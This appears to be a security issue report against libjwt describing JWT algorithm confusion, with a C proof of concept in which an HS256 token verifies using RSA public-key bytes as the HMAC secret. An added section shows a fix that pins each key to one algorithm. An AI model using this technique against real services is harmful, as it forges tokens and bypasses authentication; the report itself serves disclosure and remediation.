libjwt
[Vuln] Algorithm Confusion in jwt_decode
Hello! This library has security issues with algorithm confusion. The attacker can use the RSA public key and encrypt the JWT using the HMAC algorithm to bypass the verification. poc:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "jwt.h"

/* Token whose header says RS256; verifies against rsa_key_2048-pub.pem. */
static const char jwt_rs256_2048[] = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.ey"
"JpYXQiOjE0NzU5ODA1NDUsImlzcyI6ImZpbGVzLm1hY2xhcmEtbGxjLmNvbSIsInJlZi"
"I6IlhYWFgtWVlZWS1aWlpaLUFBQUEtQ0NDQyIsInN1YiI6InVzZXIwIn0.RlJPQst_lp"
"MJUsbnzlT2Mf3xzlHyUlVaQM_PJ1_vpBf1gHkhv-0hm3pa1_HRvpqg5UdDF3iOMLT0GU"
"j3W8JveaSvXKFeZdRpQGqmC7MZ7NzaYtyaDT7asniIVDf0JomD8Cfq8IdOn2ZREpbuJ6"
"moPwwvJ2zwL3vY-7w5A7ZQ3fxUedPuzn9n6tbEnuXcbDMyWQjen5poYmmvoIrDbzK0Zb"
"KbAJ5VrJwME_fZnPHS4c3b8rZGdBJCPI8oT2On6a9LrVqY3riqqHeiSqewfjDsox4tL2"
"G5KUpqK0oJmnZPGTnNY774PGabpcPBNbfMJqi8o8r0a7pa7sy6B59P7slUdw";

/* Token whose header says HS256. */
static const char jwt_hs256[] = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIifQ.EYXTg9j6bocqrdsK4610NSPwhJLKVYmKCIytjCiIuLo";

static unsigned char key[16384];
static size_t key_len;

/* Read the PEM public key into key[], NUL-terminated. */
static void read_key(const char *key_file)
{
	FILE *fp = fopen(key_file, "r");
	if (!fp) {
		perror(key_file);
		exit(1);
	}
	key_len = fread(key, 1, sizeof(key) - 1, fp);
	fclose(fp);
	key[key_len] = '\0';
}

int main(void)
{
	jwt_t *jwt = NULL;
	int ret;

	read_key("rsa_key_2048-pub.pem");

	/* RS256 token checked against the RSA public key. */
	ret = jwt_decode(&jwt, jwt_rs256_2048, key, key_len);
	printf("%d\n", ret);
	jwt_free(jwt);
	jwt = NULL;

	/* HS256 token checked with the same public-key bytes, now used as an
	 * HMAC secret; the report states this passes verification as well. */
	ret = jwt_decode(&jwt, jwt_hs256, key, key_len);
	printf("%d\n", ret);
	jwt_free(jwt);
	return 0;
}
```
For details, please refer to the following article: https://portswigger.net/web-security/jwt/algorithm-confusion

How to fix: Refer to https://github.com/Thalhammer/jwt-cpp and limit each key to one algorithm.

Thank you!
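An added example of the fix the report asks for, written here for illustration and not taken from the report or from libjwt: each verification key is pinned to one algorithm, and a token whose JOSE header names any other algorithm is refused before the key reaches signature verification (so `jwt_decode` would be called only when the gate returns 1). `struct pinned_key`, `pinned_key_accepts`, the placeholder key bytes and the constructed RS256 token are assumptions; the HS256 token is the one from the PoC.

```c
#include <string.h>
/* A verification key pinned to exactly one "alg": the fix the report asks for. */
struct pinned_key { const unsigned char *key; size_t key_len; const char *alg; };

/* Decode an unpadded base64url segment; returns bytes written or -1 on bad input. */
static int b64url_decode(const char *in, size_t in_len, unsigned char *out, size_t cap)
{
    static const char tbl[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_";
    unsigned int acc = 0; int bits = 0; size_t n = 0;
    for (size_t i = 0; i < in_len; i++) {
        const char *p = in[i] ? strchr(tbl, in[i]) : NULL;
        if (!p) return -1;
        acc = ((acc << 6) | (unsigned int)(p - tbl)) & 0xffffffu;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= cap) return -1;
            out[n++] = (unsigned char)((acc >> bits) & 0xffu);
        }
    }
    return (int)n;
}

/* Read "alg" from the JOSE header *before* any signature check and compare it with the
 * algorithm pinned to the key. Minimal JSON scan; a real build would use a JSON parser. */
int pinned_key_accepts(const struct pinned_key *k, const char *token)
{
    unsigned char hdr[512];
    const char *dot = strchr(token, '.');
    if (!dot) return 0;
    int n = b64url_decode(token, (size_t)(dot - token), hdr, sizeof(hdr) - 1);
    if (n < 0) return 0;
    hdr[n] = '\0';
    const char *p = strstr((const char *)hdr, "\"alg\"");
    if (!p) return 0;
    p += 5;
    while (*p == ' ') p++;
    if (*p++ != ':') return 0;
    while (*p == ' ') p++;
    if (*p++ != '"') return 0;
    const char *end = strchr(p, '"');
    if (!end) return 0;
    return (size_t)(end - p) == strlen(k->alg) && memcmp(p, k->alg, (size_t)(end - p)) == 0;
}

/* Sample inputs (constructed): placeholder bytes stand in for the PEM public key, the HS256
 * token is the PoC's, and the RS256 token reuses the PoC's RS256 header with dummy payload/sig. */
static const struct pinned_key rsa_key = { (const unsigned char *)"PEM-PLACEHOLDER", 15, "RS256" };
static const char tok_rs256[] = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.e30.c2ln";
static const char tok_hs256[] = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIifQ.EYXTg9j6bocqrdsK4610NSPwhJLKVYmKCIytjCiIuLo";
```

With the RSA key pinned to RS256, the PoC's HS256 token is refused at the header check, so the public-key bytes are never handed to an HMAC verifier.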